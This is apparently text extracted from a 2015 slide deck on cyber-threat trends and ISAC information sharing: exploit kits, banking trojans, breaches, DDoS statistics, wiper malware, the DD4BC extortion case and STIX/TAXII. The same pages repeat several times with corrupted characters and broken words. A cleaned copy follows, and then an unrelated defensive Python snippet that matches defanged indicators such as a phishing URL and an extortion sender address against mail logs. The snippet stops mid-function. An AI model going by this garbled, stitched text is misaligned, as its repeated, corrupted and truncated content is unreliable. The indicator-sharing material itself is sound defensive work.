• Israel
• DD4BC
• World Cup

Q1 2015 Compared to Q4 2014 (Akamai)

• 15% decrease in average attack time
• 35% increase in total DDoS attacks
• 42% increase in SSDP DDoS attacks (routers)
• 22% increase in application layer DDoS attacks
• 7% decrease in average attack bandwidth (170 Gbps)
• 37% increase in infrastructure layer DDoS attacks


Wiper Malware

• Shamoon – 2012
  – Attack on 30,000 Saudi Aramco workstations
  – Corrupts files and wipes devices
• South Korean Attacks – 2013
  – 2 banks, media company and insurance company
  – Patch systems targeted and used to infect
  – Wiped Windows, Linux and UNIX OS
• Las Vegas Casino – 2014
  – Wiped and destroyed files with VB bomb
• Sony – 2014
  – SMB Worm Tool: listening implant, backdoor, proxy tool, destructive hard drive tool, destructive targeted cleaning tool, network propagation wiper
  – Financial data destroyed; financial system still inoperable – asks for delay in filing


The Media and Vendors

• Malvertising
• Watering Holes
• Syrian Electronic Army

Media / Vendor Spin Incidents

• HeartBleed – OpenSSL
• Hedge Fund Attack – BAE
• Russians Attack Financial System
• Russians Hack 1.4 Billion Passwords – Hold Security

Other Threats

• Call Center – Phishing
• Mobile
• Social Media – Sony Executive on American Airlines
• Industrial Control Systems – Havex
• Espionage – VirusTotal testing for malware

Case Studies

DDoS – DD4BC

Since April 2015
• From: DD4BC Team <d4bct[AT]gmail[.]com>
• Subject: DDOS ATTACK

Size: 500 Mbps to 50 Gbps
Duration: Up to 1 hour
Ransom Demand: 25-40 BTC

United / NYSE

NYSE – July 8, 2015: 11:32am, 11:45am chatter; noon definitive word
UNITED – 8:26am: Reservation System

United Parcel Service

• USSS, NCCIC, FS-ISAC – Collaborate to release malware analysis and risk mitigation recommendations
• Shared with Retailers Association
• UPS detected and used to mitigate malware

Questions

Page 18: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

   

Primary Ways13 InformaKon Is13 Shared

uumlPortalAlerts uumlListservers uumlAutomaMon

Sample of Sharing Thread

Received close to 500 so far and sMll coming in 90 made it13 through to employees before being blocked by perimeter asspam

SubjectImportant13 message from BANK Sender youraccountBANKmessagecom URL hxxpwww2webmasterradiofm FanPageProcssLogonhtml

0 hits last13 7days

Wersquove had about13 50 hits so far all arediscarded

TLP AMBER13 PROPRIETARY INFORMATION

BANK SubmiOed atakedown request13 for the phishing site

Sample of ISAC Sharing

Indicators of Compromise IP Address Subject Line MD5 TTP Malware

Ask a question Anyone else seeing What do you do in this situation How do you handlehelliphelliphelliphellip

Share a Best Practice Herersquos how wehelliphellip

Share a Mitigation Strategy Herersquos a script you can usehelliphellip We did thishelliphellip

TLP AMBER13 PROPRIETARY INFORMATION

A Common Language

sect Structured Threat Information Expression is a common language a way for all to speak the same

   

   

Trusted Automated eXchange of Indicator Information (TAXII)

sect The goal of TAXII is to facilitate the exchange of structured cyber threat information sect Designed to support existing sharing paradigms in a

more automated manner

sect TAXII is a set of specifications defining the network-level activity of the exchange sect Defines services and messages to exchange data sect Does NOT dictate HOW data is handled in the

back-end WHAT data is shared or WHO it is shared with

sect TAXII is NOT a sharing program sect TAXII is a protocol over which STIX can be

transported

What is13 Cyber13 Threat Intelligence8 Constructs13 of STIX

Atomic

Tactical

Operational

What threat activity are we seeing

What threats should I look for on my networks and systems and why

Where has this What weaknesses What can I threat been seen does it exploit do about it

Strategic

Who is responsible for this threat

Why do they do this

What do they do

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 19: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

Sample of Sharing Thread

Received close to 500 so far and sMll coming in 90 made it13 through to employees before being blocked by perimeter asspam

SubjectImportant13 message from BANK Sender youraccountBANKmessagecom URL hxxpwww2webmasterradiofm FanPageProcssLogonhtml

0 hits last13 7days

Wersquove had about13 50 hits so far all arediscarded

TLP AMBER13 PROPRIETARY INFORMATION

BANK SubmiOed atakedown request13 for the phishing site

Sample of ISAC Sharing

Indicators of Compromise IP Address Subject Line MD5 TTP Malware

Ask a question Anyone else seeing What do you do in this situation How do you handlehelliphelliphelliphellip

Share a Best Practice Herersquos how wehelliphellip

Share a Mitigation Strategy Herersquos a script you can usehelliphellip We did thishelliphellip

TLP AMBER13 PROPRIETARY INFORMATION

A Common Language

sect Structured Threat Information Expression is a common language a way for all to speak the same

   

   

Trusted Automated eXchange of Indicator Information (TAXII)

sect The goal of TAXII is to facilitate the exchange of structured cyber threat information sect Designed to support existing sharing paradigms in a

more automated manner

sect TAXII is a set of specifications defining the network-level activity of the exchange sect Defines services and messages to exchange data sect Does NOT dictate HOW data is handled in the

back-end WHAT data is shared or WHO it is shared with

sect TAXII is NOT a sharing program sect TAXII is a protocol over which STIX can be

transported

What is13 Cyber13 Threat Intelligence8 Constructs13 of STIX

Atomic

Tactical

Operational

What threat activity are we seeing

What threats should I look for on my networks and systems and why

Where has this What weaknesses What can I threat been seen does it exploit do about it

Strategic

Who is responsible for this threat

Why do they do this

What do they do

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 20: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

Sample of ISAC Sharing

Indicators of Compromise IP Address Subject Line MD5 TTP Malware

Ask a question Anyone else seeing What do you do in this situation How do you handlehelliphelliphelliphellip

Share a Best Practice Herersquos how wehelliphellip

Share a Mitigation Strategy Herersquos a script you can usehelliphellip We did thishelliphellip

TLP AMBER13 PROPRIETARY INFORMATION

A Common Language

sect Structured Threat Information Expression is a common language a way for all to speak the same

   

   

Trusted Automated eXchange of Indicator Information (TAXII)

sect The goal of TAXII is to facilitate the exchange of structured cyber threat information sect Designed to support existing sharing paradigms in a

more automated manner

sect TAXII is a set of specifications defining the network-level activity of the exchange sect Defines services and messages to exchange data sect Does NOT dictate HOW data is handled in the

back-end WHAT data is shared or WHO it is shared with

sect TAXII is NOT a sharing program sect TAXII is a protocol over which STIX can be

transported

What is13 Cyber13 Threat Intelligence8 Constructs13 of STIX

Atomic

Tactical

Operational

What threat activity are we seeing

What threats should I look for on my networks and systems and why

Where has this What weaknesses What can I threat been seen does it exploit do about it

Strategic

Who is responsible for this threat

Why do they do this

What do they do

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 21: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

A Common Language

sect Structured Threat Information Expression is a common language a way for all to speak the same

   

   

Trusted Automated eXchange of Indicator Information (TAXII)

sect The goal of TAXII is to facilitate the exchange of structured cyber threat information sect Designed to support existing sharing paradigms in a

more automated manner

sect TAXII is a set of specifications defining the network-level activity of the exchange sect Defines services and messages to exchange data sect Does NOT dictate HOW data is handled in the

back-end WHAT data is shared or WHO it is shared with

sect TAXII is NOT a sharing program sect TAXII is a protocol over which STIX can be

transported

What is13 Cyber13 Threat Intelligence8 Constructs13 of STIX

Atomic

Tactical

Operational

What threat activity are we seeing

What threats should I look for on my networks and systems and why

Where has this What weaknesses What can I threat been seen does it exploit do about it

Strategic

Who is responsible for this threat

Why do they do this

What do they do

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware – Exploit Kits: Top Exploit Kits Seen

• Blackhole EK – Paunch 10/13
• Infinity EK – Flash player exploit
• Neutrino EK – Mixes legitimate and non-legitimate requests to obfuscate the code
• Magnitude EK – Ransomware
• Sweet Orange EK – Website
• Fiesta EK – Silverlight
• Angler EK – Hides behind legitimate web code
• Crimeboss EK – Java exploits

Ransomware
 – Cryptolocker
 – CryptoWall
 – CryptoDefense
 – TorrentLocker
 – Darkleech
Top infections: USA/Canada/UK/India. Also saw a Singapore trend.

Delivery Mechanisms: Phishing/Spearphishing

Themes seen:
• Court Notice
• Invoice/Statement
• Shipping themes – DHL, FedEx, UPS
• EZ Pass
• Bank phish – Swift Transfer
• Dhgate invoice
• eFax
• Salesforce
• Reward themes
• Airline – Delta
• WhatsApp – "You've got a voicemail"

Malware – Banking Trojans: Top Trojans Seen

• Citadel
• Kronos
• Kuluoz – Asprox
• Carberp
• Zeus
• Zberp – hybrid
• Game-over Zeus (GOZ) – P2P (arj) 9/14
• Cridex – Bugat, Feodo, Dridex
• Dyre
• Shylock – July 2014 takedown

Dyre Spreads Like a Global Virus…

June 2014 – UK, US
September 2014 – Salesforce.com attacked
October 2014 – Romania, Germany and Switzerland
November 2014 – Over 100 firms targeted
December 2014 – Australia and China

Delivery Mechanisms: Drive-by Downloads and Watering Holes

• Forbes.com
• Energystar.com
• AusPost-tracking.com
• VA.gov
• NBC.com – Citadel, 2013

Vulnerability Scanning

• Port scans – Open ports
• Vulnerability scans – WordPress, Joomla, Java, Flash, OpenSSL
• Infrastructure

Vulnerabilities

• OpenSSL/Heartbleed
 – Old vulnerability
 – Allows more data than allowed to be read
 – Website vulnerability
 – Banks took the rap unfairly
• GNU Bash/Shellshock
 – Old vulnerability (1994)
 – Unix-based: Linux, Apple Mac OS X
 – Went public Wednesday 9/24
 – Exploits and scanning seen almost immediately

Breaches

Malware: ChewBacca, Dexter, BlackPOS, Backoff

Ø Target – 70 million – 2013
Ø OPM – 21.5 million
Ø Premera BCBS – 11.2 million
Ø Community Health Systems – 4.5 million
Ø Anthem BCBS – 80 million
Ø Sony / Hacking Team

2015 Breaches Identified by the ITRC as of 8/11/2015
• Total Breaches: 5,500 approx.
• Total Records Exposed: 818,004,561
• Source: Identity Theft Resource Center

DDoS
Ø Sony PlayStation – Lizard Squad
Ø Operation Ababil
Ø Las Vegas – Gaming Industry
Ø Israel
Ø DD4BC
Ø World Cup

Q1 2015 Compared to Q4 2014 (Akamai)
• 15% decrease in average attack time
• 35% increase in total DDoS attacks
• 42% increase in SSDP DDoS attacks (routers)
• 22% increase in application layer DDoS attacks
• 7% decrease in average attack bandwidth (170 Gbps)
• 37% increase in infrastructure layer DDoS attacks

Wiper Malware

Ø Shamoon – 2012
 – Attack on 30,000 Saudi Aramco workstations
 – Corrupts files and wipes devices
Ø South Korean attacks – 2013
 – 2 banks, a media company and an insurance company
 – Patch systems targeted and used to infect
 – Wiped Windows, Linux and UNIX OS
Ø Las Vegas casino – 2014
 – Wiped and destroyed files with a VB bomb
Ø Sony – 2014
 – SMB worm tool: listening implant, backdoor, proxy tool, destructive hard drive tool, destructive targeted cleaning tool, network propagation wiper
 – Financial data destroyed; financial system still inoperable – asks for delay in filing

The Media and Vendors

• Malvertising
• Watering Holes
• Syrian Electronic Army

Media/Vendor Spin Incidents
• HeartBleed / OpenSSL
• Hedge Fund Attack – BAE
• Russians Attack Financial System
• Russians Hack 1.4 Billion Passwords – Hold Security

Other Threats

• Call Center – Phishing
• Mobile
• Social Media – Sony executive on American Airlines
• Industrial Control Systems – Havex
• Espionage – VirusTotal testing for malware

Case Studies

DDoS – DD4BC

Since April 2015
• From: DD4BC Team <d4bct[AT]gmail[.]com>
• Subject: DDOS ATTACK
• Size: 500 Mbps to 50 Gbps
• Duration: Up to 1 hour
• Ransom Demand: 25–40 BTC
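The TAXII/STIX slides earlier describe moving structured indicators between sharing partners, and the DD4BC slide shows what a shared indicator looks like on the receiving end: a defanged sender address and a subject line. The Python below is an added example, not code from the presentation or from any ISAC. It refangs such indicators, parses a few constructed mail-gateway log lines (the key=value log format is hypothetical, as is the placeholder domain indicator), and reports which lines match, which is the "what can I do about it" step for a member that has just received the indicator.

```python
import re

# Constructed indicator feed. The sender address and subject are the defanged
# values quoted on the DD4BC slide; the domain entry is a constructed placeholder.
SHARED_INDICATORS = [
    {"type": "email-addr", "value": "d4bct[AT]gmail[.]com",
     "source": "DD4BC extortion e-mails, seen since April 2015"},
    {"type": "email-subject", "value": "DDOS ATTACK",
     "source": "DD4BC extortion e-mails, seen since April 2015"},
    {"type": "domain", "value": "payment-portal-example[.]invalid",
     "source": "constructed placeholder, not from the slides"},
]

# Constructed mail-gateway log lines in a simple key=value form (hypothetical format).
MAIL_LOG = [
    '2015-07-01T09:12:03Z from=<d4bct@gmail.com> to=<soc@example.org> subject="DDOS ATTACK"',
    '2015-07-01T09:15:44Z from=<billing@example.org> to=<ap@example.org> subject="Invoice 4471"',
    '2015-07-02T11:02:19Z from=<D4BCT@GMAIL.COM> to=<cfo@example.org> subject="ddos attack - last warning"',
]

# Defanging conventions commonly used when indicators are shared by e-mail or feed.
DEFANG_PATTERNS = [
    (re.compile(r"\[\s*at\s*\]", re.IGNORECASE), "@"),
    (re.compile(r"\[\s*\.\s*\]|\(\s*\.\s*\)"), "."),
    (re.compile(r"\bhxxp(s?)://", re.IGNORECASE), r"http\1://"),
]


def refang(value: str) -> str:
    """Undo [AT], [.] and hxxp defanging and normalise case so comparisons are exact."""
    for pattern, replacement in DEFANG_PATTERNS:
        value = pattern.sub(replacement, value)
    return value.strip().lower()


LOG_FROM = re.compile(r"from=<([^<>]+)>")
LOG_SUBJECT = re.compile(r'subject="([^"]*)"')


def parse_log_line(line: str) -> dict:
    """Pull the sender address and subject out of one constructed log line."""
    sender = LOG_FROM.search(line)
    subject = LOG_SUBJECT.search(line)
    return {
        "from": sender.group(1).strip().lower() if sender else "",
        "subject": subject.group(1).strip().lower() if subject else "",
    }


def match_indicators(log_lines, indicators):
    """Return (line_number, indicator_type, refanged_value) for every hit.

    Addresses and domains must match exactly; subjects match as a
    case-insensitive substring, since extortion mails vary the wording.
    """
    hits = []
    for number, line in enumerate(log_lines, start=1):
        fields = parse_log_line(line)
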